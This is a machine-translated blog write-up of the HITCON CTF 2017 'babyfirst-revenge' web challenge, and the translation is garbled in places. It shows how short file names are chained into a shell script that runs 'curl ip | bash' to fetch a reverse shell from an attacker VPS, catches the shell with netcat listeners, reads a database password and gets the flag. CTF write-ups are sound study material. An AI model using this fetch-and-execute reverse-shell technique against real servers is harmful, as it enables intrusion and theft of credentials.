Verbatim large column https://www.dazhuanlan.com/2019/08/26/5d6339834b65e/
Look over here, you have stepped on my pit here
The first response should be to see the source code to the server webshell write, write bad moves php Trojans certainly useless, 23333
参考大佬的exp:<a href=”https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2017/babyfirst-revenge/exploit.py" target=”_blank” rel=”nofollow” https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2017/babyfirst-revenge/exploit.py</a
First use line breaks bash script written with sh to execute, will rebound shell commands written on their vps, with a curl ip | bash to bash delivery run
First thought curl this command, php source code allows you to enter a time no longer than 5 commands, ls default sort will certainly cause problems
So to write a script ls -tg, enter the name for the g script in chronological descending order (ls -t | tacg ascending)
For example this input:
ls in the final surface, and does not meet our needs
Find ways to ls on the front:
Bash will be time to carry out the encounter _ such errors will complain directly to continue to run, but does not affect the execution of ls -tg final bash
ok, here say a pit Dir:
Some would say I find that as you play command ls sort of operation and you are not the same (above figure from the local environment wls of ubuntu [sometimes convulsions, sometimes not])
May be so (from ubuntu 18 virtual machines):
Because they do not generate the same row under the php-generated content and sequence of linux commands, ls sorted according to the dictionary, is called LS_COLLATE and related
Enter LS_COLLATE = C ls can play a pleasant, 23333
Then rebounded webshell written on vps
The python script: 
the ok, for the second pit:
Your ip address vps sure you write such a little number .1 is invalid, point number written on the back will be escaped out, so the split time to pay attention, write 1.
There curl that command to write the flashback
Script execution nc listening port 8080 on your vps:
nc -lvvp 8080
ok, for the third pit:
Originally my vps is centos6 and installed above the nc command does not take, only that source too much garbage, and directly changed the ubuntu
xsser chiefs said to be divergent thinking, nc not change php -S IP: 8080 or tcpdump -i eth0 "port 8080", a study of learning
There are problems caused by the dns, pig master said -n closed dns resolution, saying unused domain name, why would it cause problems dns, there is no figured ...
nc -lvvnp 8080 on it,
It can also be used:
ncat -lvvp 8080 did not find any problem
then say, get a rebound webshell
Discovery database password and tips in the / home directory:
Connected to the database:
ok, for the fourth pit:
mysql password is typed in and did not respond, once thought to be stuck, it turned out to mysql statement went on to write, eat with the exit command, echo message
Gets flag
